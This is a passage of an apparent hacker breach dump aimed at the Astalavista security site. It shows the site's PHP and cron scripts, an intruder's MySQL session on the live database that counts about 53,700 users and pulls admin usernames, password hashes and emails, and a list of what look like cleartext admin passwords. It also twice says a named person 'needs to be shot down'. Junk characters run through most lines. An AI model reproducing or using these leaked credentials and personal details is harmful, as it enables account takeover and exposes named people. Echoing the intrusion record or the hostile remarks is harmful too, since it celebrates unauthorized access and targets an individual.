            $comExploits[$x]['userid']    = ‘12′;
2 h! V! M6 n( D; G9 l* C            $comExploits[$x]['startdate'] = ‘0000-00-00′;8 v5 n. R$ V4 x9 D4 k. @4 a
            $comExploits[$x]['enddate']   = ‘0000-00-00′;
) x$ d$ u  b) @" e1 r            $comExploits[$x]['status']    = ‘1′;
9 H( D& Y2 O/ q/ F) w/ X9 E            $comExploits[$x]['changelog'] = $date;
. o: N! v! Z# k: k- \( z. S2 a* ^! h6 W- i
        }2 i& ~1 M) D1 Z! ~+ q6 Q& p
[snip]
+ k# T* p5 r% w    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
; M. e& z% r7 R( \, T<rss version=”2.0″>
- w  D5 N* ]1 y' D2 B2 _* \7 N    <channel>* I4 D+ h& {1 X1 B! t
        <title>ASTALAVISTA.com - Exploits</title>
+ j# ~* Z, s7 Y4 ~8 e0 i) D        <link>http://www.astalavista.com/exploits</link>
/ U& b! F4 V! z5 b7 @        <description>All availably Exploits.</description>
9 Q8 l$ g$ p3 |' F4 B        <language>en-us</language>
9 x2 M/ L6 M  ]        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>+ {9 ]. o, S  K
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
8 m; n1 t% Y: F* e; u  C0 K( }        <generator>Astalavista.com</generator>+ ]' r2 ?3 l7 R  y5 k" z1 P
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
! T! M! u# N/ e8 [    </channel>
8 S" [; N5 e+ w# `4 X# P( N, [</rss>’;3 a& h, L" a6 Y" ]! b$ n

$ W7 K# B; |8 d8 [( g$ Y3 s( C# M    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
# Q  N0 F1 W2 [' ~% W# R1 {) G        unlink (FULLPATH . ‘/feed/exploits.xml’);) R& I0 a/ f3 T
    }8 j& z2 ^9 d' h4 C6 X2 ]* ]9 o- Y

7 C. _9 p( H, Y; w9 e2 a; R    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
- ]7 h9 o7 [" B6 O[snip]$ f# E7 W7 a9 y, ]& l

( V2 s4 ~- Y* R; m3 B5 \sh-3.2$ cat exploits.sh% G) Q5 J2 ~, Q" D, q4 e
#!/bin/sh
% t0 X7 T1 ]( b7 B& _
; i% W& b3 {8 ^: t" O1 I###########################################################0 o! T$ C0 \0 q' ]. A* N3 o
#                                                         #
9 h* {! _! X! p: e, g: W#   Title:        milw0rm exploits adder                  #" ]$ Z. N1 K2 x8 J# q
#   Description:  Add all milw0rm exploits to the         ## X8 b: c8 s$ f, E2 v% U
#                 Astalavista.com database                #
) P7 R: S/ Y" L; J& V+ B#                                                         #5 }' H' u3 \3 C2 f- {' @$ v5 I
#   Company:      Astalavista Group                       #
' a2 C4 E2 J" m7 Z#   Author:       Paulo M. Santos                         #+ a" u' Q1 f# W
#   E-Mail:       链接标记paulo.santos@astalavista.ch             ## D" Y" K9 r% u* ?+ e& j
#                                                         #7 k7 X7 [, w" ?, m$ u
###########################################################
. y. p1 }# Y# f* Z; _
' z! m2 }8 I' P# M9 P  N. c# path
0 p0 n# X1 O* h1 o! ^2 T* n8 v# mthis_path=/home/com/public_html/modifications/cronjobs
6 m: B; U9 F& b' ?! f# O+ X
& G' a8 U4 ?6 a  M9 x3 ?1 O# change directory
7 I$ L5 k# {" N% G# C; |/ z  [cd $this_path4 K+ h$ _, g  Y. D0 k  Y# }, M3 ^
cd tmp/% X% t4 p$ p! d. d. w
/ k/ |) h. n3 m- N
# delete files
6 u, y' T, v; f2 q/ }1 Srm -rf milw0rm.tar.* && p% L; d) r" a- a# a5 {& B
rm -rf milw0rm/ &/ ^$ F- I5 J  p# s5 A' m

$ K  ?* P" u3 M7 P" w6 ]# wget milw0rm paket
4 i! I# C; @2 Uwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]& G* v' {% B. W0 i" n) \" g
% F" S& t9 u1 `) |. Y6 n1 H# s
# extract milw0rm paket
) |3 h- M1 l8 o/ J; c! ~tar -xvf milw0rm.tar.bz23 j; ~, ]% p# J/ V, S1 Z

4 U2 U: [5 h! L) ^8 F& u( J; K# change owner) Y( e) N' @, ?" u( D6 h# d
chown -R com .% m  T1 W! @7 G6 q* S2 w- B3 v
chgrp -R com .
! X0 E7 s$ z2 `% M, E4 S, k; b; j, K5 m( g
# execute php script9 m) h) x5 _6 m
cd $this_path
! V7 [, ~! b  s: V$ p9 Y: U; zphp -q exploits.php5 O9 I% M6 n: t# }+ _

" ]# c% D& p2 y0 E0 W5 N# delete files
+ y; e% n* g- B$ b2 E, f3 irm -rf tmp/milw0rm.tar.*
/ V' r3 h+ f# O5 @6 [5 lrm -rf tmp/milw0rm/
$ E# ~/ L/ A6 y; c+ n
7 A& w: O6 x3 U0 B& r4 g- j: bsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
% j/ F& @( S: Z" hPaulo M. Santos needs to be shot down., C. E) l+ u2 b% N5 d( G
% C) R4 {3 \/ g1 [- Q
mysql -u contrexxuser2 -p
& @; ^, R% s5 ^- O& }  \; eEnter password:! y$ G* M4 ~8 B) g# d; n" @
Welcome to the MySQL monitor.  Commands end with ; or \g./ x5 B, N0 U( a( }% g
Your MySQL connection id is 261694
6 ~/ ?* u$ i+ \, [$ }1 hServer version: 5.0.45-community-log MySQL Community Edition (GPL)
; z( r5 e. ~8 J2 w+ _6 O( O1 t6 Z0 x1 R+ E: e0 C/ ]: c3 }0 u
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# @& d) q' e; T0 j% r  ?7 T/ q- F/ Z* M7 _
mysql> show databases;
& E" m* u: C$ p- R2 j: q1 z) S+——————–+
, k0 Z  d2 a7 A- X  `  ^. n| Database           |2 l! n) L) R9 r+ ^0 h/ ^
+——————–+5 V& v8 S- h6 I9 Q8 B$ F  P4 N' ~: e
| information_schema |
' c: N/ g& r( \( y| com_contrexx2      |+ h9 d$ a3 F- F# ~
| com_contrexx2_live |
+ v9 X% K2 F# ]9 D% I# Q, O9 ]| test               |
. F* [* b8 @8 h- N6 }) t! o+——————–+3 ~! G8 ?) q. K; \2 r
4 rows in set (0.00 sec)( o7 \. i4 H) b- d3 X
+ r  i0 H; _. N$ F1 B( t. {
mysql> use com_contrexx2_live9 ^" ?; _% X9 L$ ^
Database changed
; g- H% U7 R- U) R- a& `: d3 dmysql> show tables;
1 R, d6 l" _$ n( f  ^/ P. E+————————————————–+- S" M2 N' A% I$ M
| Tables_in_com_contrexx2_live                     |) n' h; F4 @! S# [( I
+————————————————–+
8 w0 v% s7 f6 V8 B) f( W| cc_banner_counter                                |
* ^0 [2 j& G- h2 U* v2 ?| cc_search_counter                                |! h! z& ~, V: S
| contrexx_access_group_dynamic_ids                |
$ }7 z# w% Q' c6 H| contrexx_access_group_static_ids                 |" D1 h# Q. U; M: C7 D, w
| contrexx_access_rel_user_group                   |) E" k! ^& g6 `1 ?7 F
| contrexx_access_settings                         |8 {$ g( Z2 u/ m% X. o
| contrexx_access_user_attribute                   |5 S# o. v6 H' f4 U% Z: b' {/ u. o; o
| contrexx_access_user_attribute_name              |3 A! O6 x; s2 D* I4 ^, v, _
| contrexx_access_user_attribute_value             |
; L5 D5 n: A0 l) [| contrexx_access_user_core_attribute              |' C( O( J1 {+ T+ M
| contrexx_access_user_groups                      |
3 w: Z) L  I0 p; Q* e% H| contrexx_access_user_mail                        |, {) n5 `% t8 w
| contrexx_access_user_profile                     |
0 o& p& G* H( Z| contrexx_access_user_title                       |
3 X2 e3 ?! d. ^% J- b" Y( K| contrexx_access_user_validity                    |( y/ T$ \% U+ M3 H* I: v
| contrexx_access_users                            |( A' Z! S4 E( `
| contrexx_backend_areas                           |
5 i" u" B3 M, B, _| contrexx_backups                                 |
' ^* S5 B! M: e4 ]| contrexx_content                                 |
" ]% C: q. O) B+ ~; I' _5 w| contrexx_content_history                         |+ D8 I4 L  C7 `9 K/ _2 x
| contrexx_content_logfile                         |3 \! r$ w1 H9 h1 E! j
| contrexx_content_navigation                      |9 o! t4 Z$ V7 M4 P% t( f
| contrexx_content_navigation_history              |, N4 n/ P- g( [/ L/ q+ r3 {# Q1 [
| contrexx_ids                                     |
% @' @) f; }2 |5 n2 n- f8 d( m| contrexx_languages                               |6 U5 N1 R, G/ D
| contrexx_lib_country                             |
7 J, A/ t, A3 J( {8 A; o; {% g& X| contrexx_log                                     |
  l1 W& T; L7 v+ t4 _| contrexx_module_alias_source                     |
8 w: C( A. s" r4 {+ D3 ?| contrexx_module_alias_target                     |
5 a; ~" I  W, p, ^; P8 i6 t| contrexx_module_block_blocks                     |0 J# L8 c3 {5 E
| contrexx_module_block_rel_lang                   |
3 q$ F1 F/ g' l, h- D, K8 N| contrexx_module_block_rel_pages                  |
) k1 R6 U! U0 @1 Q1 Z" o| contrexx_module_block_settings                   |
  {' f0 V1 O* h  Y1 C% _1 f5 m| contrexx_module_blog_categories                  |1 I. r* X3 E1 ?
| contrexx_module_blog_comments                    |7 w' J/ m( q0 S( O4 Q5 C' o% s8 j
| contrexx_module_blog_message_to_category         |
6 Y0 C9 G/ G! t1 x$ |$ }* P1 u| contrexx_module_blog_messages                    |8 A  O  r: o% Q% ], ]. K& f) y  h  g% t
| contrexx_module_blog_messages_lang               |3 k: b/ Q& Q$ D. p# Y
| contrexx_module_blog_networks                    |
' r  |* t4 C7 ?  ]; c' X$ g4 K| contrexx_module_blog_networks_lang               |
8 I( T8 B9 L# y* a1 K; }3 [. t| contrexx_module_blog_settings                    |$ u% I; Z$ c1 A2 u9 v
| contrexx_module_blog_votes                       |; Z* t9 g1 f; H8 e3 a0 D
| contrexx_module_calendar                         |, s5 |' l) G# b
| contrexx_module_calendar_access                  |
2 z, z) N& D4 N1 d| contrexx_module_calendar_categories              |9 e. J: ~! V2 G' u
| contrexx_module_calendar_form_data               |. M$ v" ^/ M; Z# d9 C1 {
| contrexx_module_calendar_form_fields             |
0 y- o. h/ I7 a, c* ~" H. l& a2 S| contrexx_module_calendar_registrations           |
0 j  L# j  F3 y" O2 d8 j9 q| contrexx_module_calendar_settings                |
  C: A. C* L$ V4 [: L' t| contrexx_module_calendar_style                   |
8 f$ I3 _! L4 ^| contrexx_module_contact_form                     |* Z" _8 m# V0 ]3 U( q  A+ ^3 t
| contrexx_module_contact_form_data                |
% B) [2 K! E, `: l1 {6 @| contrexx_module_contact_form_field               |
1 c, v8 {) U7 w7 y; B, c" [: [| contrexx_module_contact_settings                 |
! a* @1 P* D8 g4 n3 P| contrexx_module_data_categories                  |" O) }4 ^& _! C5 {
| contrexx_module_data_message_to_category         |
% e& y( T# ?4 ]. y| contrexx_module_data_messages                    |
$ e( M+ N* a/ Q7 F7 ]$ }| contrexx_module_data_messages_lang               |
) b' H& S; E- Z# l4 W| contrexx_module_data_placeholders                |
! x8 i. Z9 t2 ^2 z9 l+ m- t| contrexx_module_data_settings                    |' H$ _" }+ X9 [. p- U5 N* M7 I
| contrexx_module_directory_access                 |
; `# H+ O& J8 z| contrexx_module_directory_categories             |
, V* E: K/ a8 A| contrexx_module_directory_dir                    |) G" d$ B* B- w5 r1 @
| contrexx_module_directory_inputfields            |1 Y( n; J0 m0 [( u4 U
| contrexx_module_directory_levels                 |* D" V/ {# K2 k* o- z9 W: C
| contrexx_module_directory_mail                   |
7 Y4 u7 e: C' o0 F' h| contrexx_module_directory_rel_dir_cat            |
& C4 _3 l; l. L8 c( o/ X$ h| contrexx_module_directory_rel_dir_level          |( r8 Q- Y% x4 B. h; G
| contrexx_module_directory_settings               |
9 |% x$ Q$ V6 q6 K4 `* F- J| contrexx_module_directory_settings_google        |, q4 Z1 [5 @0 L/ {8 H. b
| contrexx_module_directory_vote                   |
& {, j6 ~9 o. ^. A% q. a! @  q| contrexx_module_docsys                           |5 I2 [2 t+ p% c$ c& C
| contrexx_module_docsys_categories                |& p7 K+ {: W+ u
| contrexx_module_egov_configuration               |2 u7 w% k* k+ B. s/ T
| contrexx_module_egov_orders                      |
2 I: g, X& [, ]( ~; A| contrexx_module_egov_product_calendar            |0 I8 p+ L; R# c$ h+ k
| contrexx_module_egov_product_fields              |0 \$ L% w$ i) @- K; |- W; E3 r
| contrexx_module_egov_products                    |0 C2 N+ R/ t" |3 H3 |0 t5 c6 a
| contrexx_module_egov_settings                    |
7 g7 I2 ~& y1 }9 m2 Z& Z2 J' p: ^| contrexx_module_exploits                         |& |1 [* R: Y$ D9 B0 @- z1 m
| contrexx_module_exploits_categories              |
7 M& {* o# P7 h9 C1 x| contrexx_module_feed_category                    |9 J- P" R4 u/ B  _
| contrexx_module_feed_news                        |. o7 f; Z6 I: j2 g# ~
| contrexx_module_feed_newsml_association          |
  l: T. J6 }) g  o, J, G| contrexx_module_feed_newsml_categories           |
7 |/ m( E( \6 I, h| contrexx_module_feed_newsml_documents            |
* |0 R% Z% N9 p- x' O9 w$ }. W, ?| contrexx_module_feed_newsml_providers            |
# g6 s( T  F( @1 G. i| contrexx_module_forum_access                     |
7 [2 @; g9 B/ _5 C, _3 a7 @| contrexx_module_forum_categories                 |$ C/ A1 @; F# J
| contrexx_module_forum_categories_lang            |
+ q' r! N& I6 B! C* \7 m7 L| contrexx_module_forum_notification               |
- s, ^5 ]+ E* ?1 Q4 ]! n| contrexx_module_forum_postings                   |  M6 @9 |, @3 E2 ?
| contrexx_module_forum_rating                     |9 {0 v. ]* g2 l$ B# ~6 v
| contrexx_module_forum_settings                   |
: y7 [7 j2 @# J3 }| contrexx_module_forum_statistics                 |
* s1 R( l; X' s+ |8 c" Y5 b| contrexx_module_gallery_categories               |
+ s* ^; B8 n) F' t| contrexx_module_gallery_comments                 |! [1 I/ y! B. i( Q8 ]& I
| contrexx_module_gallery_language                 |( @1 R4 x8 E8 ~( `' B4 ^' E6 J
| contrexx_module_gallery_language_pics            |
8 a' @) ]+ y8 ~) u, M, S| contrexx_module_gallery_pictures                 |5 O( t, h% S5 n1 Y
| contrexx_module_gallery_settings                 |
* U4 s' z# m3 Y- d" t2 V| contrexx_module_gallery_votes                    |$ [# f& H" j  l+ n
| contrexx_module_guestbook                        |
. v8 b8 J% c% x- z7 u5 l| contrexx_module_guestbook_settings               |  ^+ h9 E- s7 Y" i7 c5 s8 O, ]; W
| contrexx_module_livecam                          |
' d2 c: P/ ]0 p; H7 E, j' K, p! c| contrexx_module_livecam_settings                 |4 R% G4 Z* e: @+ w
| contrexx_module_market                           |* @( e( X6 C* v+ H/ d+ O/ p
| contrexx_module_market_access                    |. }5 H* \0 E7 G  P  I0 F
| contrexx_module_market_categories                |
0 t3 n0 K" c# c0 s. A| contrexx_module_market_mail                      |. l0 t2 ~9 z! _, e% N/ @
| contrexx_module_market_paypal                    |, k2 w, X; \/ n5 A
| contrexx_module_market_settings                  |
% p8 S4 l. F  |1 \3 s: W| contrexx_module_market_spez_fields               |
. M9 j  e. ~) f9 p7 C( n5 n8 A5 k| contrexx_module_mediadir_access                  |
8 \7 e( h3 i/ T( |- C, w" _| contrexx_module_mediadir_categories              |, Z! [' Y  x/ e
| contrexx_module_mediadir_comments                |
* ]- ~: t/ t8 ^| contrexx_module_mediadir_dir                     |
) R- I  P4 R( C| contrexx_module_mediadir_inputfields             |# b' m& v4 J3 k% |
| contrexx_module_mediadir_levels                  |( R1 s. y; u- k, ~
| contrexx_module_mediadir_mail                    |
3 P- F3 a& d" A1 {' k; s| contrexx_module_mediadir_rel_dir_cat             |8 T6 I5 q- c$ `9 i5 H
| contrexx_module_mediadir_rel_dir_level           |: S  m( w* A! G/ Y
| contrexx_module_mediadir_reports                 |
5 r& m/ N1 B' K1 O% L| contrexx_module_mediadir_settings                |
: A, r8 N2 s1 |/ t- _0 I4 t  P: z| contrexx_module_mediadir_settings_google         |
2 I7 p9 L0 y, x9 w( l| contrexx_module_mediadir_vote                    |
, E6 S, O: V8 p4 {) @5 c; e" m| contrexx_module_memberdir_directories            |$ T1 ]5 E3 L! D
| contrexx_module_memberdir_name                   |
' j6 ^- l* f( W! a! X, q% ]2 D0 ~* n| contrexx_module_memberdir_settings               |0 A. P  q( |$ D9 w+ a
| contrexx_module_memberdir_values                 |! E9 W! ~( i/ @& ]# C4 S
| contrexx_module_nettools_allowed_groups          |( ~. o# [! a! G+ ~3 B9 {# w* c
| contrexx_module_nettools_settings                |
5 v5 G( `' D) I% z2 i| contrexx_module_news                             |% F1 Q- Y* O0 {/ T# A! e4 C
| contrexx_module_news_access                      |
% x* _/ e3 K& G% `1 q| contrexx_module_news_categories                  |
/ w& V3 |" j3 q$ n! J; |% Q| contrexx_module_news_settings                    |4 i, n+ e. D1 u1 Z# w8 A4 `
| contrexx_module_news_teaser_frame                |+ q( {$ o& m. f8 A: {
| contrexx_module_news_teaser_frame_templates      |5 m- Q8 Z" M$ V7 A; G- a' v2 @" k
| contrexx_module_news_ticker                      |
3 r+ }7 |6 r4 [- N| contrexx_module_newsletter                       |, i/ W/ A& P8 L8 |& A! X
| contrexx_module_newsletter_attachment            |
1 R, F/ Y% }  U+ ?( _2 T+ j$ X7 x% k| contrexx_module_newsletter_category              |
% }7 P7 J  Y% Z) h4 {| contrexx_module_newsletter_confirm_mail          |' V/ a+ y' i" G2 N6 a
| contrexx_module_newsletter_rel_cat_news          |
6 ]- X9 e2 }8 I) F& [| contrexx_module_newsletter_rel_user_cat          |
8 h$ t( f" s! l: {. _2 F| contrexx_module_newsletter_settings              |1 k( d5 D/ u6 g4 Q! E
| contrexx_module_newsletter_template              |! r1 L2 `+ u/ r9 }+ `
| contrexx_module_newsletter_tmp_sending           |5 g( x' Y7 V$ b- v% Z2 ?
| contrexx_module_newsletter_user                  |
' n2 t, j8 ]3 F- v  j| contrexx_module_newsletter_user_title            |
9 X* o' D* y/ C  c: n| contrexx_module_onlinetools_defaultports         |
5 U4 T. `9 g) @; x| contrexx_module_onlinetools_defaultports_back    |
9 _4 j# ^* @, s+ k& M  r7 t2 [| contrexx_module_onlinetools_geolitecity_blocks   |7 B5 `5 w1 l6 ^" m
| contrexx_module_onlinetools_geolitecity_country  |3 H3 `% M$ {2 i" I8 H
| contrexx_module_onlinetools_geolitecity_location |
  }' b0 I- E. b" w8 c| contrexx_module_podcast_category                 |
6 ~4 ~. u% |" P% W4 l4 v| contrexx_module_podcast_medium                   |
# P" g6 R; ^4 T( b' E| contrexx_module_podcast_rel_category_lang        |
! J# t) V! e! g/ H6 i| contrexx_module_podcast_rel_medium_category      |
( C, x  r, l) m; I' j) E  w  u| contrexx_module_podcast_settings                 |
# v# l$ j! E5 b| contrexx_module_podcast_template                 |
1 y" l, r- `8 b5 \| contrexx_module_proxydb                          |. h  ~/ ?6 i0 e  ]
| contrexx_module_recommend                        |+ r; Y. t% D  O4 u
| contrexx_module_repository                       |
2 |" q4 s1 C3 }2 j2 u; v9 F| contrexx_module_securitynews_cats                |
0 b( N$ ~# W: ^) {7 ~7 M) M2 u| contrexx_module_securitynews_feeds               |9 Y; H; m  U/ |2 A
| contrexx_module_securitynews_news                |
+ m5 X. R9 M8 d0 t) V: h| contrexx_module_shop_categories                  |
: y1 D! }: {6 }  O6 d| contrexx_module_shop_config                      |
+ S3 G" v8 N: [1 I8 W( l+ F| contrexx_module_shop_countries                   |0 Q- \7 K0 n+ c, t2 j
| contrexx_module_shop_currencies                  |
; [, @5 b+ e& i, M" ?) J+ b; i| contrexx_module_shop_customers                   |
/ Q1 x! g9 n1 b) L3 Z" L' B, c| contrexx_module_shop_importimg                   |% g" M7 \" {# p% Z& t
| contrexx_module_shop_lsv                         |
; ~4 i$ ?# P2 W# [| contrexx_module_shop_mail                        |
. |' j( G3 Z4 P  f* V: B- K& L7 u| contrexx_module_shop_mail_content                |
# S! z3 p4 x* e| contrexx_module_shop_manufacturer                |- F) d5 D/ `0 f
| contrexx_module_shop_order_items                 |
9 P3 J; E3 H& D  \6 K. k| contrexx_module_shop_order_items_attributes      |) [( _7 k! k+ m' o' _. C; c) k
| contrexx_module_shop_orders                      |
- L5 m  ?/ q. @2 y. T; y7 s6 i| contrexx_module_shop_payment                     |, k& S8 F0 `- }" m; v' c7 s$ l3 \
| contrexx_module_shop_payment_processors          |8 B( W; k: \7 \! v  A
| contrexx_module_shop_pricelists                  |) P$ _9 F1 ~" F2 G  n0 J. S2 [
| contrexx_module_shop_products                    |* `2 H4 u. T5 D1 [! h
| contrexx_module_shop_products_attributes         |
# v" C3 z# {. p2 k( q| contrexx_module_shop_products_attributes_name    |
6 S- J5 f3 F; A4 f' `| contrexx_module_shop_products_attributes_value   |- ?% q3 H5 c! v) C, J/ Y
| contrexx_module_shop_products_downloads          |$ G; p! Y7 F# h, f5 V- @, ^% H
| contrexx_module_shop_rel_countries               |
1 V6 S/ f9 b7 e; I3 e' m; F5 G, @9 M| contrexx_module_shop_rel_payment                 |' k9 M0 ~9 B2 x6 P2 L
| contrexx_module_shop_rel_shipment                |- I" u$ w2 D5 Y6 Y# [; z
| contrexx_module_shop_shipment_cost               |
8 U8 \3 N" }7 N. |8 T| contrexx_module_shop_shipper                     |
0 f3 d8 p3 B# }. O! Q) p- n$ U| contrexx_module_shop_vat                         |
; y! Z/ I/ h9 U) @& L1 y" Y$ K# E  Y| contrexx_module_shop_zones                       |
* I6 G& I6 a9 E4 @7 v| contrexx_module_u2u_address_list                 |
2 U: e5 K3 e% f9 B$ G; z| contrexx_module_u2u_message_log                  |! r1 j  l, B* u2 c. V2 g$ s
| contrexx_module_u2u_sent_messages                |
% s; q8 M- C9 a0 b- G7 q| contrexx_module_u2u_settings                     |
  |: U' O0 R6 ^/ i, t" {8 z| contrexx_module_u2u_user_log                     |, E$ z6 c$ U: u0 _) {5 K
| contrexx_modules                                 |' z8 |* m; Z) `+ {$ {
| contrexx_sessions                                |; K1 A: c0 T) j8 j3 v4 i
| contrexx_settings                                |. V' U; M% M3 ^8 u
| contrexx_settings_smtp                           |+ J1 O/ \* k# Q3 K2 T3 T( W
| contrexx_skins                                   |
4 Z: V' t+ _9 @, g4 o| contrexx_stats_browser                           |
: a8 W4 _( R" T| contrexx_stats_colourdepth                       |" K* N) v- z/ F! M
| contrexx_stats_config                            |0 |; t+ ?4 H; W/ d4 _7 v
| contrexx_stats_country                           |5 }7 b7 Z  w+ A6 o' A! T
| contrexx_stats_hostname                          |
! o2 |: [1 E2 v3 M| contrexx_stats_javascript                        |% @( W# r2 Z6 b1 l! N# p  P
| contrexx_stats_operatingsystem                   |
. c/ H, j0 p( T' f! _2 k3 o" p2 [| contrexx_stats_referer                           |5 s6 O4 q/ w" G4 C, r
| contrexx_stats_requests                          |2 i# }+ }* u2 ?  B/ K  B, S
| contrexx_stats_requests_summary                  |
4 [. @9 N" B9 P# f/ M| contrexx_stats_screenresolution                  |: ^% C. s* W3 q, M( H( C0 a) A! T6 w
| contrexx_stats_search                            |4 o$ v/ Y* @7 K
| contrexx_stats_spiders                           |- Y" `& H7 d( r1 x  E: {
| contrexx_stats_spiders_summary                   |1 ^5 B9 d0 Y. f
| contrexx_stats_visitors                          |
0 v' _+ c! A( W$ W: z' S| contrexx_stats_visitors_summary                  |
. ~5 }- o/ J# W# q" m8 X| contrexx_voting_additionaldata                   |8 E$ C4 P  @3 ~) }
| contrexx_voting_email                            |
% \" \, e" u1 s% d4 z| contrexx_voting_rel_email_system                 |
% b4 `  [) S9 {| contrexx_voting_results                          |
6 ~# p: k: p4 M/ F| contrexx_voting_system                           |. Q9 |" m* }: e
| foo                                              |
2 M$ c) M2 d: B" X+————————————————–+- m* \( ?' A9 T  U8 u$ \5 X
227 rows in set (0.01 sec)! q* n5 D; w5 j+ I
/ M* r& }1 C0 \: v
mysql> select count(*) as skids from contrexx_access_users;: _/ |( M* E3 q/ [0 l
+——-+
# N6 E- c( U$ g! Y0 M$ V| skids |
4 e0 O; n5 v8 f: b8 N2 f+——-+4 ^0 s; t" q8 O  s6 _
| 53699 |+ ^/ h5 ]' |$ x8 N+ x  O! N
+——-+! ^1 K7 |: L3 u7 s
1 row in set (0.00 sec)
9 B, H" H6 A# @2 M& O! x
6 X/ q( {! Q% c( @; G% h# Q* Mmysql> describe contrexx_access_users;
, G8 R6 Z. k! o2 H4 C* @+——————+——————————————+——+—–+————–+—————-+
1 M, Q- o- m' a( X- e; _| Field            | Type                                     | Null | Key | Default      | Extra          |
& \+ v7 y/ q& {* q" \- B7 c( n# I+——————+——————————————+——+—–+————–+—————-+
$ \+ @% \% [' m* b| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |) h4 ?# U7 |0 g0 B
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |% J$ l. Q- f2 ]6 z/ k* l
| username         | varchar(40)                              | YES  | MUL | NULL         |                |+ M5 v7 Y  [/ M. ]1 b
| password         | varchar(32)                              | YES  |     | NULL         |                |
  K0 b! `- V8 c1 S| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
- C4 J: X7 {, ^5 S| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
4 r7 {3 ^7 {! }+ }+ O. F| validity         | int(10) unsigned                         | NO   |     | 0            |                |- a1 y$ [3 R. j7 L/ T# U
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
5 F5 s; X& G3 i+ S0 B' V8 A3 z| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
2 m7 A* q: F  \) n! h  p; R| email            | varchar(255)                             | YES  |     | NULL         |                |
5 K5 N- E3 v" z4 |! }# N# |4 a0 q| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
0 u/ E& L4 Q% e9 Q9 a  X| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
) C3 j+ I( s' V+ K# u* d| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
0 V" F1 z9 O6 _/ W| active           | tinyint(1)                               | NO   |     | 0            |                |
- @- V7 i+ y+ d* h8 \/ V9 }| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
3 S: Z& V( y0 y: U8 P  L5 o| restore_key      | varchar(32)                              | NO   |     |              |                |( W/ `6 Q" `6 O+ f9 h" A) {. o
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
! r9 {" `. d$ E+ y| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |# S/ A- U. F8 L: C8 y
+——————+——————————————+——+—–+————–+—————-+
8 G4 T' O! ]4 T  X& i  [18 rows in set (0.00 sec)
9 V( T( P+ h$ Q/ k) w1 o1 b
8 N9 T1 P" D) Q( qmysql> select username,password,email from contrexx_access_users where is_admin = 1;4 Q' _/ B5 i( w. ]; s# ^/ x
+————+———————————-+—————————–+
% U1 G" \2 u8 P  [& F9 ~| username   | password                         | email                       |
9 D7 F/ b& ?5 i' t3 F* f' ^+————+———————————-+—————————–+
) O; p- ~' W5 V& U| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |$ g; n& y# r" o! H
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |- t* b$ V! T# R
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |% S+ j, y: V6 A3 Q2 ?8 J+ x
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
, ?: S' j2 U6 v0 ]( m$ v+————+———————————-+—————————–+5 Z% i7 F& j" T  e2 y
4 rows in set (0.04 sec)
( e  ~& u% O! g5 U5 h; H6 R1 p
mysql> exit;
' a5 i( I( f' A) x/ YBye
( T: L' q4 A( {% n+ f* d6 h3 H% [- E8 S9 b& y9 z5 @+ W0 s
[~] There you go, your “team of security and IT professionals” is a joke.+ P0 i6 e1 G$ z. z

- q1 `9 n# E$ y$ N% n# y+——————————+
; m1 V" F# a; ?: F) t) zsystem:f82BN3+_*
7 B$ S" ~2 V/ {! {3 K! wBe1er0ph0r:belerophor4astacom
9 Y; `7 K' v( T& X" W/ u; Hprozac:asta4cms!
# x7 x2 e1 K* X( v5 q% ?9 `commander:mpbdaagf6m# H4 D- _: J  p$ B! y4 t
sykadul:ak29eral
, w% U2 W' `) a1 {! I3 j+——————————+7 _$ K, J. U. g7 _6 f$ d% }
( g, L- R7 A* Z5 ^9 f9 B
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)/ Z! B% E* @4 h5 |1 p6 l+ n
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.3 G3 S, k/ g5 R; a* @) `1 S* K* B0 S
, Y) v% n" t+ l7 P. K8 _% J
[~] Lets move to astalavista.net now,
$ D. Y% W% s. t% P8 ]  V+ U: x6 I) C1 [( o4 z
From <链接标记[url]https://www.astalavista.net/[/url]>:0 v; E2 o1 s3 {9 F1 x* Z
>> Everyone knows that the best defense is a good offense.
$ Y1 Z* e# S2 S, V>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
) A, Q4 ~) {) T( `4 S/ ~>> The ASTALAVISTA hacking & security community is the largest IT security community in the world., o; y8 R% L; p
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”' W1 l, t' v. e. o2 G! l  a' t- k
1 a$ t( Z, f4 o( B* x8 d
>> Go ahead, try and hack our server . in a completely legal way!& @/ d7 y2 o2 F! j1 Z+ u
>> Learn by doing: We offer our members tricky tasks and challenges on an  @& _* L! E4 p9 Z* J7 Q
>> ongoing basis so you can test your knowledge and abilities. You can also% ?% R- \. b1 U. j3 d
>> demonstrate what you.ve mastered by taking part in regular hacker contests
/ H- m* k8 [$ n/ C/ K. s& i; m>> and war games
1 Q& L- ?) H* N+ {4 S1 C* X" E% n- J6 w! L0 a% Q0 U) B
